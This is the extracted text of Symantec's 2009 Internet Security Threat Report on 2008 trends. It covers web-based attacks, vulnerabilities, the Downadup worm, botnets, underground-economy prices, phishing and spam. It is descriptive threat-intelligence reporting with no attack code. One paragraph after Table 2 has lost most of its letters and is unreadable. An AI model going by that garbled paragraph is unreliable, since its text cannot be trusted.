B-whitepaper Internet Security Threat Report Xiv 04-2009.en-us


  • 8/14/2019 B-whitepaper Internet Security Threat Report Xiv 04-2009.en-us

    1/110

Symantec Enterprise Security

Symantec Global Internet Security Threat Report

Trends for 2008

Volume XIV, Published April 2009


Marc Fossi, Executive Editor, Manager, Development, Security Technology and Response

Eric Johnson, Editor, Security Technology and Response

Trevor Mack, Associate Editor, Security Technology and Response

Dean Turner, Director, Global Intelligence Network, Security Technology and Response

Joseph Blackbird, Threat Analyst, Symantec Security Response

Mo King Low, Threat Analyst, Security Technology and Response

Teo Adams, Threat Analyst, Security Technology and Response

David McKinney, Threat Analyst, Security Technology and Response

Stephen Entwisle, Threat Analyst, Security Technology and Response

Marika Pauls Laucht, Threat Analyst, Security Technology and Response

Candid Wueest, Threat Analyst, Security Technology and Response

Paul Wood, Senior Analyst, MessageLabs Intelligence, Symantec

Dan Bleaken, Threat Analyst, MessageLabs Intelligence, Symantec

Greg Ahmad, Threat Analyst, Security Technology and Response

Darren Kemp, Threat Analyst, Security Technology and Response

Ashif Samnani, Threat Analyst, Security Technology and Response


Contents

Introduction . . . . 4

Executive Summary . . . . 5

Highlights . . . . 13

Threat Activity Trends . . . . 17

Vulnerability Trends . . . . 35

Malicious Code Trends . . . . 55

Phishing, Underground Economy Servers, and Spam Trends . . . . 73

Appendix A: Symantec Best Practices . . . . 93

Appendix B: Threat Activity Trends Methodology . . . . 95

Appendix C: Vulnerability Trends Methodology . . . . 97

Appendix D: Malicious Code Trends Methodology . . . . 104

Appendix E: Phishing, Underground Economy Servers, and Spam Trends Methodology . . . . 105


    Introduction

The Symantec Global Internet Security Threat Report provides an annual overview and analysis of worldwide Internet threat activity, a review of known vulnerabilities, and highlights of malicious code. Trends in phishing and spam are also assessed, as are observed activities on underground economy servers. Previously presented every six months, this volume of the Symantec Global Internet Security Threat Report will alert readers to trends and impending threats that Symantec has observed for 2008.

Symantec has established some of the most comprehensive sources of Internet threat data in the world through the Symantec Global Intelligence Network. More than 240,000 sensors in over 200 countries monitor attack activity through a combination of Symantec products and services such as Symantec DeepSight Threat Management System, Symantec Managed Security Services and Norton consumer products, as well as additional third-party data sources.

Symantec also gathers malicious code intelligence from more than 130 million client, server, and gateway systems that have deployed its antivirus products. Additionally, Symantec's distributed honeypot network collects data from around the globe, capturing previously unseen threats and attacks and providing valuable insight into attack methods.

Symantec maintains one of the world's most comprehensive vulnerability databases, currently consisting of more than 32,000 recorded vulnerabilities (spanning more than two decades) affecting more than 72,000 technologies from more than 11,000 vendors. Symantec also facilitates the BugTraq mailing list, one of the most popular forums for the disclosure and discussion of vulnerabilities on the Internet, which has approximately 50,000 subscribers who contribute, receive, and discuss vulnerability research on a daily basis.

Spam and phishing data is captured through a variety of sources including: the Symantec Probe Network, a system of more than 2.5 million decoy accounts; MessageLabs Intelligence, a respected source of data and analysis for messaging security issues, trends and statistics; and other Symantec technologies. Data is collected in more than 86 countries from around the globe. Over eight billion email messages, as well as over one billion Web requests, are processed per day across 16 data centers. Symantec also gathers phishing information through an extensive antifraud community of enterprises, security vendors and more than 50 million consumers.

These resources give Symantec's analysts unparalleled sources of data with which to identify, analyze, and provide informed commentary on emerging trends in attacks, malicious code activity, phishing, and spam. The result is the Symantec Global Internet Security Threat Report, which gives enterprises and consumers the essential information to effectively secure their systems now and into the future.


    Executive Summary

The Symantec Internet Security Threat Report consists mainly of four reports: the Global Internet Security Threat Report; the EMEA Internet Security Threat Report, for the Europe, the Middle East, and Africa (EMEA) region; the APJ Internet Security Threat Report, for the Asia-Pacific/Japan (APJ) region; and the Government Internet Security Threat Report, which focuses on threats of specific interest to governments and critical infrastructure sectors. Together, these reports provide a detailed overview and analysis of Internet threat activity, malicious code, and known vulnerabilities. Trends in phishing and spam are also assessed, as are observed activities on underground economy servers.

This summary will discuss current trends, impending threats, and the continuing evolution of the Internet threat landscape based on data for 2008 discussed within the four reports. This summary will also discuss how regional differences can affect malicious activity globally.

There are a number of trends noted in previous volumes of the Symantec Internet Security Threat Report that continued in 2008: malicious activity has increasingly become Web-based; attackers are targeting end users instead of computers; the online underground economy has consolidated and matured; and attackers are able to rapidly adapt their attack activities.1

Symantec recently examined these trends along with the continued consolidation of malicious activities in the online underground economy in the Symantec Report on the Underground Economy.2 That report found that the underground economy is geographically diverse and able to generate millions of dollars in revenue for (often) well-organized groups. The underground economy is also increasingly becoming a self-sustaining system with tools specifically developed to facilitate fraud and theft freely bought and sold. These tools are then used for information theft that may then be converted into profit to fund the development of additional tools.

Based on the data and discussions presented in the current Symantec Internet Security Threat Report, this summary will examine the primary methods being used to compromise end users and organizations, who is staging these attacks, and what these attacks are after. Finally, this summary will look at emerging trends that Symantec believes will become prevalent in the near future.

    How users are being compromised

Web-based attacks are now the primary vector for malicious activity over the Internet. The continued growth of the Internet and the number of people increasingly using it for an extensive array of activities presents attackers with a growing range of targets as well as various means to launch malicious activity.3 Within this activity, Symantec has noted that most Web-based attacks are launched against users who visit legitimate websites that have been compromised by attackers in order to serve malicious content.

Some of the common techniques used by attackers to compromise a website include exploiting a vulnerable Web application running on the server (by attacking through poorly secured input fields), or exploiting some vulnerability present in the underlying host operating system. In 2008 alone, there were 12,885 site-specific vulnerabilities identified (figure 1) and 63 percent of vulnerabilities documented by Symantec affected Web applications. Attackers can exploit these vulnerabilities in a website or underlying application to modify the pages served to users visiting the site. This can include directly serving malicious content from the site itself, or embedding a malicious iframe on pages that can direct a user's browser to another Web server that is under the attacker's control.4 In this way, the compromise of a single website can cause attacks to be launched against every visitor to that site.

1 http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf
2 http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_underground_economy_report_11-2008-14525717.en-us.pdf
3 http://www.verisign.com/static/043939.pdf

Figure 1. Site-specific vulnerabilities

Period | Site-specific vulnerabilities
2007 | 17,697
2008 | 12,885

Source: Based on data provided by the XSSed Project5

In the case of a popular, trusted site with a large number of visitors, this can yield thousands of compromises from a single attack. For example, one attack that targeted the websites of both the United Nations and the UK government, among others, injected malicious code that was designed to load content from an attacker-controlled location onto visitors' browsers.6 Another separate attack successfully defaced the national Albanian postal service website.7 These types of attacks provide a potential beachhead for distributing malicious code because they target high-traffic websites of reputable organizations.

In order to compromise the largest possible number of websites with a single mechanism, attackers will attempt to compromise a class of vulnerability by searching for commonalities within them and generically automating the discovery and exploitation. This allows attackers to compromise websites with the efficiency commonly found in network worms.

The length and complicated steps being pursued to launch successful Web-based attacks also demonstrate the increasing complexity of the methods used by attackers. While a single high-severity flaw can be exploited to fully compromise a user, attackers are now frequently stringing together multiple exploits for medium-severity vulnerabilities to achieve the same goal. An indication of this is that eight of the top 10 vulnerabilities exploited in 2008 were rated as medium severity.

4 An iframe is an HTML element that can include Web content from other pages or Web servers to be rendered when the user visits the original page. This element can be constructed so that it is effectively invisible and the user will not see any of the embedded content when viewing the original page.
5 Data was provided by the XSSed Project, a site devoted to tracking and verifying reports of site-specific cross-site scripting vulnerabilities: http://www.xssed.com
6 http://news.cnet.com/8301-10789_3-9925637-57.html
7 http://albaniapress.com/?p=3


Many enterprises and end users will often make patching high-severity vulnerabilities a top priority, while medium- and low-severity vulnerabilities may be ignored. This could result in the possibility of more computers remaining exposed for longer periods to these vulnerabilities. For example, of the 12,885 site-specific cross-site scripting vulnerabilities identified by Symantec in 2008, only 394 (3 percent) are known by Symantec to have been fixed.8

These developments and trends indicate that Web-based threats have not only become widespread, but that they have also increased in sophistication. In particular, Symantec has noticed that some bots (such as Asprox,9 which was initially used for phishing scams) are being designed to specifically exploit cross-site scripting vulnerabilities in order to inject malicious code onto compromised websites.10

In many cases, medium-severity vulnerabilities are sufficient to mount successful attacks if attackers are able to execute arbitrary code and perform actions such as accessing confidential information or making network connections. This is made possible because many end users do not require administrative privileges to run or modify the targeted applications. While the danger of client-side vulnerabilities may be limited by best practices, such as restricting Web applications at the administrative level, this is often unrealistic given how integral Web applications are to the delivery of content for many businesses. Medium-severity vulnerabilities affecting client or desktop applications are often sufficient for an attacker to mount successful malicious attacks on individual end users as well as at the enterprise level.

That said, however, a single high-severity vulnerability was the top attacked flaw in 2008. Previous editions of the Symantec Internet Security Threat Report noted that there has been a decrease in the volume of network worms, primarily due to a lack of easily exploitable remote vulnerabilities in default operating system components. Many network worms exploited such vulnerabilities in order to propagate. Highly successful worms, such as CodeRed,11 Nimda,12 and Slammer,13 all exploited high-severity vulnerabilities in remotely accessible services to spread. These worms prompted changes in security measures, such as the inclusion of personal firewall applications in operating systems that are turned on by default. This helped protect users from most network worms, even if the vulnerability being exploited was not immediately patched.

The high-severity vulnerability in question was a zero-day vulnerability that was discovered in late 2008 in the Microsoft Windows Server Service RPC Handling component that allowed remote code execution.14 Because remote communication with this service is allowed through the Windows firewall when file and printer sharing is turned on, many users would have to apply the patch to be protected from exploitation attempts. Soon after, a new worm called Downadup (also known as Conficker) emerged that exploited this vulnerability.15 Downadup was able to spread rapidly, partially due to its advanced propagation mechanisms and its ability to spread through removable media devices.16 By the end of 2008 there were well over a million individual computers infected by Downadup. Once Downadup has infected a computer, it uses a Web or peer-to-peer (P2P) update mechanism to download updated versions of itself, or to install other malicious code onto the compromised computer.

8 For the purposes of this report, cross-site scripting encapsulates two broad classes of vulnerability; this includes traditional cross-site scripting and a category known as HTML injection (or persistent cross-site scripting).
9 http://www.symantec.com/security_response/writeup.jsp?docid=2007-060812-4603-99
10 http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 33
11 http://www.symantec.com/security_response/writeup.jsp?docid=2001-071911-5755-99
12 http://www.symantec.com/security_response/writeup.jsp?docid=2001-091816-3508-99
13 http://www.symantec.com/security_response/writeup.jsp?docid=2003-012502-3306-99
14 http://www.securityfocus.com/bid/31874
15 http://www.symantec.com/security_response/writeup.jsp?docid=2008-112203-2408-99
16 https://forums2.symantec.com/t5/Malicious-Code/Downadup-Attempts-at-Smart-Network-Scanning/ba-p/382114 - A233


Downadup has been particularly prolific in the APJ and Latin America (LAM) regions.17 These regions are also where some of the highest software piracy rates are recorded.18 Because pirated versions of software are frequently unable to use automated update mechanisms for security patches (in many cases they are detected and disabled), it is likely many computers in these two regions have not been patched against Downadup. Software piracy rates are often higher in emerging markets with rapidly growing Internet and broadband infrastructures.19

From the data gathered for this reporting period, Symantec has also noted other significant malicious activities occurring in countries with rapidly emerging Internet infrastructures. For example, while the United States is still home to a large amount of threat activity and continues to be the top ranked country for malicious activity (primarily due to its extensive broadband penetration and significantly developed Internet infrastructure), Symantec has noted a steady increase in malicious activity in countries not previously associated with such activities. One result of this trend is that these countries can appeal to attackers as potential bases for hosting phishing websites, spam relays, and other malicious content, possibly because rapidly growing ISPs in these areas may have difficulty monitoring and filtering the growing volume of traffic across their networks.

Attackers are also organized enough to implement contingency plans in case their activities are detected. By locating their activities in a variety of countries, attackers can minimize the chances of being partially or completely shut down. This is demonstrated by events after the shutdown of a U.S.-based ISP toward the end of 2008.20 It seems that the bot controllers generating much of the attack activity from this ISP had alternative hosting plans.21 As a result, although Symantec noted a significant drop in malicious activity after the shutdown, particularly in spam, the numbers returned to previous levels soon afterward. It became apparent that the bot controllers had been able to successfully relocate enough of their bot command-and-control (C&C) servers to other hosts, and were thus able to build their botnets back up to previous numbers. Given that the affected botnets were three of the world's largest, it is not surprising that new locations were quickly found to host these servers due to the significant profits such botnets are able to generate.

    What attackers want

More than ever before, attackers are concentrating on compromising end users for financial gain. In 2008, 78 percent of confidential information threats exported user data, and 76 percent used a keystroke-logging component to steal information such as online banking account credentials. Additionally, 76 percent of phishing lures targeted brands in the financial services sector (figure 2) and this sector also had the most identities exposed due to data breaches. Similarly, 12 percent of all data breaches that occurred in 2008 exposed credit card information. In 2008 the average cost per incident of a data breach in the United States was $6.7 million,22 which is an increase of 5 percent from 2007, and lost business amounted to an average of $4.6 million.23

17 https://forums2.symantec.com/t5/Malicious-Code/Downadup-Geo-location-Fingerprinting-and-Piracy/ba-p/380993 - A228
18 http://arstechnica.com/old/content/2008/01/bsa-piracy-economic-impact-is-tens-of-billions-of-dollars.ars
19 http://findarticles.com/p/articles/mi_0EIN/is_2008_May_14/ai_n25411795
20 http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_12-2008.en-us.pdf : p. 7
21 http://www.theregister.co.uk/2008/11/18/short_mccolo_resurrection/
22 All figures are in U.S. dollars unless otherwise noted.
23 http://www.encryptionreports.com/download/Ponemon_COB_2008_US_090201.pdf


Table 1. Goods and services available for sale on underground economy servers

2008 Rank | 2007 Rank | Item | 2008 Percentage | 2007 Percentage | Range of Prices
1 | 1 | Credit card information | 32% | 21% | $0.06–$30
2 | 2 | Bank account credentials | 19% | 17% | $10–$1000
3 | 9 | Email accounts | 5% | 4% | $0.10–$100
4 | 3 | Email addresses | 5% | 6% | $0.33/MB–$100/MB
5 | 12 | Proxies | 4% | 3% | $0.16–$20
6 | 4 | Full identities | 4% | 6% | $0.70–$60
7 | 6 | Mailers | 3% | 5% | $2–$40
8 | 5 | Cash out services | 3% | 5% | 8%–50% or flat rate of $200–$2000 per item
9 | 17 | Shell scripts | 3% | 2% | $2–$20
10 | 8 | Scams | 3% | 5% | $3–$40/week for hosting, $2–$20 design

Source: Symantec

One result that Symantec has drawn from the observance of increased professionalization in the underground economy is that the coordination of specialized and, in some cases, competing groups for the production and distribution of items such as customized malicious code and phishing kits has led to a dramatic increase in the general proliferation of malicious code. In 2008, Symantec detected 1,656,227 malicious code threats (figure 3). This represents over 60 percent of the approximately 2.6 million malicious code threats that Symantec has detected in total over time.

Figure 3. New malicious code threats

Period | Number of new threats
2002 | 20,547
2003 | 18,827
2004 | 69,107
2005 | 113,025
2006 | 140,690
2007 | 624,267
2008 | 1,656,227

Source: Symantec


An example of this type of underground professional organization is the Russian Business Network (RBN). The RBN reputedly specializes in the distribution of malicious code, hosting malicious websites, and other malicious activity. The RBN has been credited with creating approximately half of the phishing incidents that occurred worldwide last year. It is also thought to be associated with a significant amount of the malicious activities on the Internet in 2007.

Since then there have been two significant instances of ISPs that were shut down because of malicious activity. These ISPs were hosting malicious code, phishing websites, bot C&C servers, and spam relays. This includes the instance noted above, when Symantec saw a 65 percent drop in spam and a 30 percent decrease in bot activity within 24 hours of one particular ISP being taken offline.25 While it is remarkable that the shutdown of a single ISP can result in such drastic decreases in malicious activity within a short period, as noted, malicious activity is increasingly organized and attackers are now readily prepared for contingencies that might affect their operations. Much of the malicious activity was simply shifted to other locations. In this instance, the ISP even resurfaced briefly to afford the group an opportunity to update the bots under their control.26

In this increasingly sophisticated Internet threat landscape, there is a growing impetus for greater cooperation to address the high degree of organization of groups creating threats on the Internet. This was demonstrated by the aggressive spread of the Downadup worm in the late months of 2008 and into 2009. Due to its multiple propagation mechanisms, the worm was able to spread rapidly. More worrisome is the fact that the worm contains an update mechanism that could allow new versions of the worm or other threats, such as a bot, to be installed on compromised computers. To combat its rapid spread and aggressive profile, a coalition was formed by stakeholders involved in Internet security.27 The success of this coalition in identifying how the worm operates, slowing its growth, and limiting its potential damage demonstrates the benefits of increased cooperation among Internet security stakeholders.

    Conclusion

Changes in the current threat landscape, such as the increasing complexity and sophistication of attacks, the evolution of attackers and attack patterns, and malicious activities being pushed to emerging countries, show not just the benefits of, but also the need for increased cooperation among security companies, governments, academics, and other organizations and individuals to combat these changes. Symantec expects malicious activity to continue to be pushed to regions with emerging infrastructures that may still lack the resources to combat the growing involvement of organized crime in the online underground economy. The onus will be on organizations, institutions, and other knowledgeable groups to come together for the benefit of the affected regions. Internet threat activity is truly global, and malicious activity allowed to flourish in one area could quickly spread worldwide.

With the increasing adaptability of malicious code developers and their ability to evade detection, Symantec also expects that overt attack activities will either be abandoned or pushed further underground.

For example, if the effort to set up malicious ISPs outweighs the return for attackers before being taken offline, it is likely that attackers will abandon this approach for other attack vectors in order to continue to evade detection and potential apprehension or prosecution. This has already been seen with the use of HTTP and P2P communication channels in threats such as Downadup. Because of the distributed nature of these control channels, it is much more difficult to disable a network and locate the individual or group behind the attacks.

25 Cf. http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_12-2008.en-us.pdf : p. 7 and http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 26
26 http://www.pcworld.com/businesscenter/article/154554/spammers_regaining_control_over_srizbi_botnet.html
27 https://forums2.symantec.com/t5/Malicious-Code/Coalition-Formed-in-Response-to-W32-Downadup/ba-p/388129 - A241

The large increase in the number of new malicious code threats, coupled with the use of the Web as a distribution mechanism, also demonstrates the growing need for more responsive and cooperative security measures. While antivirus signature scanning, heuristic detection, and intrusion prevention continue to be vital for the security of organizations as well as end users, new technologies, such as reputation-based security, will become increasingly important.

The focus of threats in 2008 continued to be aimed at exploiting end users for profit, and attackers have continued to evolve and refine their abilities for online fraud. While some criminal groups have come and gone, other large organizations persist and continue to consolidate their activities. These pseudo-corporations and their up-and-coming competitors will likely remain at the forefront of malicious activity in the coming year.


    Highlights

This section provides highlights of the security trends that Symantec observed in 2008 based on the data gathered from the sources listed in the introduction to this report. Selected metrics will be discussed in greater depth in the sections that follow.

    Threat Activity Trends Highlights

• During this reporting period, 23 percent of all malicious activity measured by Symantec in 2008 was located in the United States; this is a decrease from 26 percent in 2007.

• The United States was the top country of attack origin in 2008, accounting for 25 percent of worldwide activity; this is a decrease from 29 percent in 2007.

• The education sector accounted for 27 percent of data breaches that could lead to identity theft during this period, more than any other sector and a slight increase from 26 percent in 2007.

• The financial sector was the top sector for identities exposed in 2008, accounting for 29 percent of the total and an increase from 10 percent in 2007.

• In 2008, the theft or loss of a computer or other data-storage devices accounted for 48 percent of data breaches that could lead to identity theft and for 66 percent of the identities exposed.

• Symantec observed an average of 75,158 active bot-infected computers per day in 2008, an increase of 31 percent from the previous period.

• China had the most bot-infected computers in 2008, accounting for 13 percent of the worldwide total; this is a decrease from 19 percent in 2007.

• Buenos Aires was the city with the most bot-infected computers in 2008, accounting for 4 percent of the worldwide total.

• In 2008, Symantec identified 15,197 distinct new bot command-and-control servers; of these, 43 percent operated through IRC channels and 57 percent used HTTP.

• The United States was the location for the most bot command-and-control servers in 2008, with 33 percent of the total, more than any other country.

• The top Web-based attack in 2008 was associated with the Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness vulnerability, which accounted for 30 percent of the total.

• The United States was the top country of origin for Web-based attacks in 2008, accounting for 38 percent of the worldwide total.

• The United States was the country most frequently targeted by denial-of-service attacks in 2008, accounting for 51 percent of the worldwide total.


    Vulnerability Trends Highlights

• Symantec documented 5,491 vulnerabilities in 2008; this is a 19 percent increase over the 4,625 vulnerabilities documented in 2007.

• Two percent of vulnerabilities in 2008 were classified as high severity, 67 percent as medium severity, and 30 percent as low severity.28 In 2007, 4 percent of vulnerabilities were classified as high severity, 61 percent as medium severity, and 35 percent as low severity.

• Eighty percent of documented vulnerabilities were classified as easily exploitable in 2008; this is an increase from 2007, when 74 percent of documented vulnerabilities were classified as easily exploitable.

• Of the browsers analyzed in 2008, Apple Safari had the longest window of exposure (the time between the release of exploit code for a vulnerability and a vendor releasing a patch), with a nine-day average; Mozilla browsers had the shortest window of exposure in 2008, averaging less than one day.

• Mozilla browsers were affected by 99 new vulnerabilities in 2008, more than any other browser; there were 47 new vulnerabilities identified in Internet Explorer, 40 in Apple Safari, 35 in Opera, and 11 in Google Chrome.29

• There were 415 browser plug-in vulnerabilities identified in 2008, fewer than the 475 identified in 2007. ActiveX technologies still constituted the majority of new browser plug-in vulnerabilities, with a total of 287; however, this is substantially down from the 399 ActiveX vulnerabilities identified in 2007.

• Memory corruption vulnerabilities again made up the majority of the types of vulnerabilities in browser plug-in technologies for 2008, with 271 vulnerabilities classified as such.

• In 2008, 63 percent of vulnerabilities affected Web applications, an increase from 59 percent in 2007.

• During 2008, there were 12,885 site-specific cross-site scripting vulnerabilities identified, compared to 17,697 in 2007; of the vulnerabilities identified in 2008, only 3 percent (394 vulnerabilities) had been fixed at the time of writing.

• In 2008, Symantec documented nine zero-day vulnerabilities, compared to 15 in 2007.

• The top attacked vulnerability for 2008 was the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability.

• In 2008, 95 percent of attacked vulnerabilities were client-side vulnerabilities and 5 percent were server-side vulnerabilities, compared to 93 percent and 7 percent, respectively, in 2007.

28 Percentages are rounded off to the closest whole number and percentages may not equal 100 percent in some instances.
29 Google Chrome was released in September 2008.


    Malicious Code Trends Highlights

• In 2008, the number of new malicious code signatures increased by 265 percent over 2007; over 60 percent of all currently detected malicious code threats were detected in 2008.

• Of the top 10 new malicious code families detected in 2008, three were Trojans, three were Trojans with a back door component, two were worms, one was a worm with a back door component, and one was a worm with back door and virus components.

• Trojans made up 68 percent of the volume of the top 50 malicious code samples reported in 2008, a minor decrease from 69 percent in 2007.

• Five of the top 10 staged downloaders in 2008 were Trojans, two were Trojans that incorporated a back door component, one was a worm, one was a worm that incorporated a back door, and one was a worm that incorporated a virus component.

• In 2008, the proportional increase of potential malicious code infections was greatest in the Europe, the Middle East and Africa region.

• The percentage of threats to confidential information that incorporate remote access capabilities declined to 83 percent in 2008; this is a decrease from 91 percent in 2007, although such threats remained the most prevalent exposure type.

• In 2008, 78 percent of threats to confidential information exported user data and 76 percent had a keystroke-logging component; these are increases from 74 percent and 72 percent, respectively, in 2007.

• Propagation through executable file sharing continued to increase in 2008, accounting for 66 percent of malicious code that propagates, up from 44 percent in 2007.

• One percent of the volume of the top 50 malicious code samples modified Web pages in 2008, down from 2 percent in 2007.

• The percentage of documented malicious code samples that exploit vulnerabilities declined substantially, from 13 percent in 2007 to 3 percent in 2008.

• In 2008, eight of the top 10 downloaded components were Trojans, one was a Trojan with a back door component, and one was a back door.

• Malicious code that targets online games accounted for 10 percent of the volume of the top 50 potential malicious code infections, up from 7 percent in 2007.


    Phishing, Underground Economy Servers, and Spam Trends Highlights

• The majority of brands used in phishing attacks in 2008 were in the financial services sector, accounting for 79 percent, down slightly from 83 percent identified in 2007.

• The financial services sector accounted for the highest volume of phishing lures during this period, with 76 percent of the total; this is considerably higher than in 2007, when the volume for financial services was 52 percent.

• In 2008, Symantec detected 55,389 phishing website hosts, an increase of 66 percent over 2007, when Symantec detected 33,428 phishing hosts.

• In 2008, 43 percent of all phishing websites identified by Symantec were located in the United States, considerably less than in 2007, when 69 percent of such sites were based there.

• The most common top-level domain used in phishing lures detected in 2008 was .com, accounting for 39 percent of the total; it was also the highest ranking top-level domain in 2007, when it accounted for 46 percent of the total.

• One particular automated phishing toolkit identified by Symantec was responsible for an average of 14 percent of all phishing attacks during 2008.

• Credit card information was the most commonly advertised item for sale on underground economy servers known to Symantec, accounting for 32 percent of all goods and services; this is an increase from 2007 when credit card information accounted for 21 percent of the total.

• The United States was the top country for credit cards advertised on underground economy servers, accounting for 67 percent of the total; this is a decrease from 2007 when it accounted for 83 percent of the total.

• The most common type of spam detected in 2008 was related to Internet- or computer-related goods and services, which made up 24 percent of all detected spam; in 2007, this was the second most common type of spam, accounting for 19 percent of the total.

• Symantec observed a 192 percent increase in spam detected across the Internet, from 119.6 billion messages in 2007 to 349.6 billion in 2008.

• In 2008, 25 percent of all spam recorded by Symantec originated in the United States, a substantial decrease from 45 percent in 2007, when the United States was also the top ranked country of origin.

• In 2008, bot networks were responsible for the distribution of approximately 90 percent of all spam email.


    Threat Activity Trends

This section of the Symantec Global Internet Security Threat Report will provide an analysis of threat activity, as well as other malicious activity, data breaches, and Web-based attacks that Symantec observed in 2008. The malicious activity discussed in this section not only includes threat activity, but also phishing, malicious code, spam zombies, bot-infected computers, and bot C&C server activity. Attacks are defined as any malicious activity carried out over a network that has been detected by an intrusion detection system (IDS) or firewall. Definitions for the other types of malicious activities can be found in their respective sections within this report.

This section will discuss the following metrics, providing analysis and discussion of the trends indicated by the data:

• Malicious activity by country

• Data breaches that could lead to identity theft by sector

• Data breaches that could lead to identity theft by cause

• Bot-infected computers

• Bot command-and-control servers

• Top Web-based attacks

• Top countries of origin for Web-based attacks

• Threat activity: protection and mitigation

Malicious activity by country

This metric will assess the countries in which the largest amount of malicious activity takes place or originates. To determine this, Symantec has compiled geographical data on numerous malicious activities, including: bot-infected computers, phishing website hosts, malicious code reports, spam zombies, and attack origin. The rankings are determined by calculating the mean average of the proportion of these malicious activities that originated in each country.

Malicious activity usually affects computers that are connected to high-speed broadband Internet because these connections are attractive targets for attackers. Broadband connections provide larger bandwidth capacities than other connection types, faster speeds, the potential of constantly connected systems, and typically more stable connections. The top three countries in this metric (United States, China, and Germany) all have extensively developed and growing broadband infrastructures.30 China, which passed the United States for the largest number of broadband subscribers for the first time in 2008, has 21 percent of the worldwide broadband subscriber total with 83.3 million subscribers. The United States is second with 20 percent, while Germany is fourth with 6 percent. Each country also experienced a growth of over 20 percent in broadband subscribers from 2007.

In 2008, the United States was the top country for overall malicious activity, making up 23 percent of the total (table 2). This is a decrease from 2007 when the United States was also first, with 26 percent. Within specific category measurements, the United States ranked first in malicious code, phishing website hosts, and attack origin.

30 http://www.point-topic.com


Table 2. Malicious activity by country

2008 Rank | 2007 Rank | Country | 2008 Overall Percentage | 2007 Overall Percentage | Malicious Code Rank | Spam Zombies Rank | Phishing Websites Host Rank | Bot Rank | Attack Origin Rank
1 | 1 | United States | 23% | 26% | 1 | 3 | 1 | 2 | 1
2 | 2 | China | 9% | 11% | 2 | 4 | 6 | 1 | 2
3 | 3 | Germany | 6% | 7% | 12 | 2 | 2 | 4 | 4
4 | 4 | United Kingdom | 5% | 4% | 4 | 10 | 5 | 9 | 3
5 | 8 | Brazil | 4% | 3% | 16 | 1 | 16 | 5 | 9
6 | 6 | Spain | 4% | 3% | 10 | 8 | 13 | 3 | 6
7 | 7 | Italy | 3% | 3% | 11 | 6 | 14 | 6 | 8
8 | 5 | France | 3% | 4% | 8 | 14 | 9 | 10 | 5
9 | 15 | Turkey | 3% | 2% | 15 | 5 | 24 | 8 | 12
10 | 12 | Poland | 3% | 2% | 23 | 9 | 8 | 7 | 17

Source: Symantec

    th slgh dcas ovall alcous acv fo h Ud Sas ca b abud o h do

    sa zobs h. ths s l kl du o h shudow of wo U.S.-basd Wb hosg coas ha

    w allgdl hosg a lag ub of bo C&C svs assocad wh sa dsbuo bo woks

    (bos).31 Sa acv dcasd woldwd af boh shudows. i o cas, Sac obsvd a

    65 c dcas sa affc h 24 hous ha followd.32 Boh coas allgdl hosd a

    lag ub of bo C&C svs fo sval lag sa bos: Szb,33 rusock,34 ad Ozdok (mga-D).35

    Sa zobs ha lack a ccal coad ss a uabl o sd ou sa.

    China had the second highest amount of overall worldwide malicious activity in 2008, accounting for 9 percent; this is a decrease from 11 percent in the previous reporting period. Along with the fact that China has the most broadband subscribers in the world, the amount of time spent online by users there could contribute to the high percentage of malicious activity in China. The longer a user is online, the longer the computer is exposed to malicious attack or compromise, and Internet users in China spend more of their leisure time online than users in any other country.36 Online leisure activities are also typically more likely to include activities on sites that may be vulnerable to attacks, including social networking websites, online gaming sites, forums, blogs, and online shopping sites. Dynamic sites such as forums are targets for attackers using bot-infected computers to propagate and host malicious content, since Web application and site-specific vulnerabilities can put these types of sites at risk.

    The slight drop in China's percentage of malicious activity in 2008 was mainly due to the drop in phishing website hosts and bot-infected computers. China dropped from third for phishing website hosts in 2007 to sixth in 2008, with just under 3 percent of the global total; and, although China maintained its top ranking for bot-infected computers, its global share in this regard decreased from 19 percent in 2007 to 13 percent in 2008.

    One possible cause for the decreases may be national initiatives to block websites potentially most susceptible to fraud in an effort to increase online security for users ahead of the 2008 Beijing Olympic Games. Thousands of websites were either shut down or blacklisted as part of this effort, including a substantial number of messaging forums,37 which, as noted previously, are popular targets of attack through Web application and site-specific vulnerabilities. A reduction in the number of bot-infected computers should result in a corresponding drop in other attack activity categories, such as spam zombies, because these are often associated with bot-infected computers. China dropped from third in spam zombies in 2007, with 7 percent of the worldwide total, to fourth and 6 percent in 2008.

    31 http://voices.washingtonpost.com/securityfix/2008/10/spam_volumes_plummet_after_atr.html
    32 http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_12-2008.en-us.pdf
    33 http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99
    34 http://www.symantec.com/security_response/writeup.jsp?docid=2006-011309-5412-99
    35 http://www.symantec.com/security_response/writeup.jsp?docid=2008-021215-0628-99
    36 http://www.tnsglobal.com/_assets/files/TNS_Market_Research_Digital_World_Digital_Life.pdf

    Another factor that may have contributed to the lower percentage of bot-infected computers in China in 2008 was that many unlicensed Internet cafés there were also shut down, and supervision of the remaining cafés was tightened to help address the online security risks associated with the casual use of public computers.38 Public computers tend to be more susceptible to attacks because of the significant amount of varied traffic on such terminals. They are frequently used by a great variety of people for many different activities such as email, online shopping, and gaming. The variety of usage, and the likelihood that transient users are less aware of or concerned with security, makes such computers attractive to attackers.

    In 2008, Germany again ranked third with 6 percent of all Internet-wide malicious activity, down slightly from 7 percent in 2007. In both years, Germany ranked highly in spam zombies and in hosting phishing websites, activities that are often associated with bot networks. In 2008, Germany ranked fourth for bot C&C servers, with 5 percent of the total. This high number of bot C&C servers likely indicates that botnets are prominent in Germany, which would contribute to the high amount of overall malicious activity originating there. Spam zombies are also often concentrated in regions with high broadband penetration and bandwidth capacity, because these conditions facilitate sending out large amounts of spam quickly.

    It is reasonable to expect that the United States, China and Germany will continue to outrank other countries in this measure, as they have done for the past several reporting periods. Beyond these three, however, countries such as Brazil, Turkey, Poland, India, and Russia are expected to continue to increase their share of overall malicious activity because they all have rapidly growing Internet infrastructures and growing broadband populations.39 Countries with a relatively new and growing Internet infrastructure tend to experience increasing levels of malicious activity until security protocols and measures are improved to counter these activities.

